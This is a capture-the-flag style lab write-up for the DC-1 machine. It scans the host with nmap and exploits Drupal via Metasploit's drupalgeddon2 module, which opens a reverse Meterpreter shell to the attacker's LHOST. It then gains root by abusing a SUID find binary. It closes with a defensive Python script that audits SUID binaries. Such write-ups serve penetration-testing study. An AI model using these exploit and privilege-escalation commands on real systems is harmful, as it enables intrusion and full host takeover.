PG-DC-1

Step.1 Scan

Start with an nmap scan.

nmap -T4 192.168.111.193
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
111/tcp open  rpcbind

Step.2 Exploit

The web page turns out to be a Drupal site, so try exploiting it with Metasploit.

msfconsole
msf6 > search drupal

There is a usable exploit module:

1   exploit/unix/webapp/drupal_drupalgeddon2                          2018-03-28       excellent  Yes 

Select the module with the use command.

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2

LHOST is set to your own (attacking) machine's address.

RHOSTS is set to the target host's address.

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 192.168.45.152
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.111.193

The option names in the commands above can also be written in lowercase: LHOST -> lhost, RHOSTS -> rhosts.

Run exploit (or run) to launch the module.

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started reverse TCP handler on 192.168.45.152:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39927 bytes) to 192.168.111.193
[*] Meterpreter session 1 opened (192.168.45.152:4444 -> 192.168.111.193:58932) at 2024-10-11 05:05:12 +0800
meterpreter >

local flag

Seeing the meterpreter prompt means the exploit succeeded; use the shell command to open a shell.

As usual, upgrade it to a pty shell:

python -c 'import pty;pty.spawn("/bin/bash")'


root flag

Use the find command to look for files with the SUID bit set.

find / -perm /4000 2>/dev/null

The find binary itself is in the list:

/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

Look up find on GTFOBins for a way to spawn a shell from it:

find . -exec /bin/sh \; -quit

This gives a root shell.
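The root cause of this escalation is a SUID bit on /usr/bin/find, a binary that can execute arbitrary commands. As an added example (not part of the original writeup), the script below audits a SUID listing like the one above: it parses the output of find / -perm /4000, flags any binary that can run commands as critical, and flags anything outside an allowlist for review. The sample listing is the one from the writeup; the allowlist and the command-runner set are constructed assumptions and should be tuned per build.

```python
"""Audit SUID binaries against an expected allowlist (added example).

Input is either the text output of `find / -perm /4000` or a live walk of the
filesystem. Output is a list of (path, severity) findings. Nothing is changed
on disk; remediation (chmod u-s) is printed for an operator to review.
"""
import os
import stat

# Constructed sample: the SUID listing the writeup found on the target.
SAMPLE_SUID_LIST = """\
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
"""

# Assumed allowlist: binaries that legitimately need SUID on a Debian-style
# host. Anything not listed is reported for review, never removed automatically.
EXPECTED_SUID = frozenset({
    "/bin/mount", "/bin/umount", "/bin/su", "/bin/ping", "/bin/ping6",
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/at", "/usr/sbin/exim4", "/usr/lib/pt_chown",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/sbin/mount.nfs",
})

# Assumed set of basenames that can execute arbitrary commands (the class of
# binary GTFOBins catalogues). SUID on any of these is root-equivalent.
COMMAND_RUNNERS = frozenset({
    "find", "vim", "vi", "nano", "less", "more", "awk", "env",
    "python", "python3", "perl", "bash", "sh", "dash",
})


def parse_suid_list(text):
    """Turn `find / -perm /4000` output into a list of paths, skipping blanks."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def classify(paths):
    """Return (path, severity) for every SUID path that needs attention.

    'critical' = can run arbitrary commands; 'review' = not in the allowlist.
    Paths that are both allowed and harmless produce no finding.
    """
    findings = []
    for path in paths:
        base = os.path.basename(path)
        if base in COMMAND_RUNNERS:
            findings.append((path, "critical"))
        elif path not in EXPECTED_SUID:
            findings.append((path, "review"))
    return findings


def live_suid_list(root="/"):
    """Collect SUID regular files on this host by walking the filesystem."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found


def remediation(path):
    """Suggested fix for a finding: drop the SUID bit, operator applies it."""
    return "chmod u-s " + path


if __name__ == "__main__":
    for path, severity in classify(parse_suid_list(SAMPLE_SUID_LIST)):
        print(f"[{severity}] {path}  ->  {remediation(path)}")
```

Run as-is it audits the embedded sample and reports /usr/bin/find as critical and /usr/bin/procmail for review; swap in live_suid_list() to audit the host it runs on. The command-runner check deliberately ignores the allowlist, so an allowlisted interpreter would still be reported.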
